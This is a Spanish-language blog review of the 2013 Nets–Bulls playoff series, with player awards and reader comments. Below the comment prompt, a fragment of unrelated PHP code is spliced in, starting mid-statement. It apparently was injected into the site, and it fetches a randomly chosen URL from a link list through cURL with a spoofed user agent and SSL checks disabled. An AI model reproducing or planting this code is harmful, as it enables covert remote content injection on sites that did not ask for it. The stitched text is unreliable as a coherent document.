Resumen Brooklyn Nets 3 – Chicago Bulls 4

07 de May de 2013 por TheDeerHunter

nets bullsCon cierto retraso que nos perdonaréis pasamos a analizar lo que dió de si una de las eliminatorias más intensas e interesantes de primera ronda, si no la que más. Resuelta en el filo del 7º choque, para algunos ya no es que fuera una sorpresa que los Bulls sin Rose y con varias bajas prevalecieran, sino incluso que llegaran a plantar cara ante el plantillón millonario que habían montado los Nets. Está escrito que otros lo veían de distinta forma.

Diría que si se piensa bien, independientemente de los 330 millones y de toda esa zarandanga que no siempre es concluyente en lo deportivo, la experiencia como grupo determina un buen número de veces la resolución de una eliminatoria a muerte como es ésta. Dimos particularmente en el clavo avanzando que no había batalla entre un Tim Thibodeau especialmente preparado para amargar la existencia a los rivales en Playoffs y un Carlesimo al que, según él mismo, sólo le habría servido el anillo para conservar el puesto. Nosotros le creemos. Anda que han tardado.

Los proyectos nuevos, por muchos millones que se desembolsen en su diseño, no suelen funcionar del todo bien. No lo hizo ni el paradigma que son los Heat y en realidad lo más extraño es un caso como los Celtics de Rivers, Ray, Pierce y Garnett. Que nadie pretenda comparar a estos Nets ni con unos ni con otros, por favor. Por si faltaban datos, los Bulls venían de tocarle varias veces la cara en la regular.

El caso es que los Bulls se presentan algo más cascados de la cuenta, en un equipo con una exigencia física tan marcada. Quitando Joe Johnson, que según él no estaba para jugar (habrá que plantearse qué es no estar para jugar según él) los Nets no contaban con ninguna baja significativa, a diferencia del resto de equipos participantes en postemporada, esencialmente. Por ahí las cosas se igualaban, y es un equipo con argumentos, no se puede negar.

Muchos me mataréis, pero bajo mi punto de vista, los Nets han jugado un gran baloncesto a pesar de caer eliminados. De hecho, su diferencial en toda la serie es positivo y en algunos momentos (como durante gran parte de ese para ellos fatídico 4º encuentro) no sólo que parecían tener la situación bajo control sino que se mostraban casi intratables. Pero por suerte, el baloncesto no sólo es meter un 60% de tus tiros durante un buen rato, sino que también es pelea bajo los tableros o en un balón dividido, es cambiar el chip si te ves superado y buscar alternativas sobre la marcha, es no bajar la cabeza ante las adversidades, es hacer que tu afición se vuelva loca si logras encontrar la tecla y también es dominar psicológicamente cualquier situación. Talento sí, pero también corazón, instinto, pelotas… y por ahí es donde los Bulls han sido entre mejores y mucho mejores y por donde otros han quedado retratados como estrellas de segunda categoría. Es mucho de eso lo que separa a un mito de un buen jugador.

PREMIOS

booz nateMVP: Sólido Carlos Boozer, sospechoso habitual. Suele pecar bastante de lo que hablábamos antes pero ha aprovechado bien lo que otros han remado para aportar su talento, que es mucho. El más regular de los suyos con números más que notables: 17.4 puntos, 10.6 rebotes y 2 asistencias. Fundamental en esta victoria.

La sorpresa: Nate Robinson ha jugado extraordinariamente bien durante gran parte de la campaña. No obstante se erigió en el líder espiritual de estos Bulls en aquellos  últimos 4 minutos del 4 encuentro. Inesperado. Increíble. Místico. Sin esa avalancha baloncestística esta serie no se entendería.

La decepción: No hay decepción individual, sino colectiva. Sostengo que ha sido más mérito de Chicago que demérito de los Nets. Si acaso, el carácter mostrado por alguno de ellos que hasta hace nada había estado considerado casi como súper-estrella.

El mayor esfuerzo en vano: PJ Carlesimo. Sin pasar a analizar su parte de culpa creo que el papelón que le ha tocado vivir ha sido de cuidado. No es fácil ser interino, que lo sepa todo el mundo, lograr influir de alguna manera en los acontecimientos y que encima termines siendo el principal (¿único?) responsable. Vida ingrata la de muchos entrenadores de perfil bajo.

Comenta

5 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Excelente análisis Deer. Lo cojonudo es que viendo a estos Bulls, cualquiera diría que no eran muy diferentes de los Bulls del año pasado que cayeron en la desidia contra unos p… Sixers de m… Creo que Thiboddeau nos ha dado una lección a todos. El año pasado lo matamos en este foro, pero el tío ha seguido confiando en lo que tenía, y ha creado un grupo de guerreros. Me sorprende que no esté en el análisis Joakim Noah. Impresionante su último partido. Entre él y Nate Robinson la liaron pardísima. Que se preparen estos Heat porque van a tener faena… y de la buena

      Citar

  2. Esteban dice:
    #2

    bueno ya hare el analisis de la temporada de los nets donde se vera quien cuimnplio las expectativas y quien no

    por el momento de parte de los de brooklyn, bien se puede nombrar la confirmacion como buen buen jugador de brook lopez, en mas de 20 ppp frente a un juego interior de los mas potentes de la liga como el de los bulls

    lo que podria hacer lopez frente a bosh no?

    poco mas que rescatar;

    un tema que adelantar, DERON lleva 3 años en los NETS, dos de ellos no clasificaron a PO, siendo uno de los peores equipos de la liga, y este llega a primera ronda de PO y afuera

    habria que replantearse la idea de si es el jugador franquicia que todos creian

      Citar

  3. Lucho dice:
    #3

    El MVP yo se lo hubiera dado a Nate
    O, volando un poco, al corazon de los Bulls (personificado en el de Noah)

    Boozer en sorpresa, peleando con Jimmy Butler

      Citar

  4. Futurman dice:
    #4

    Todos los jugadores toros han estado de escandalo, el que no enchufaba defendía, el que no ponía pelotas… impresioantes.

      Citar

  5. MagicJohnson32 dice:
    #5

    Mi MVP de esta serie ha sido Thibodeau. Creo que no abundan las ocasiones en las que un entrenador marque auténticas diferencias (me refiero a la diferencia entre pasar una ronda o quedar eliminado), y éste ha sido uno de esos casos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>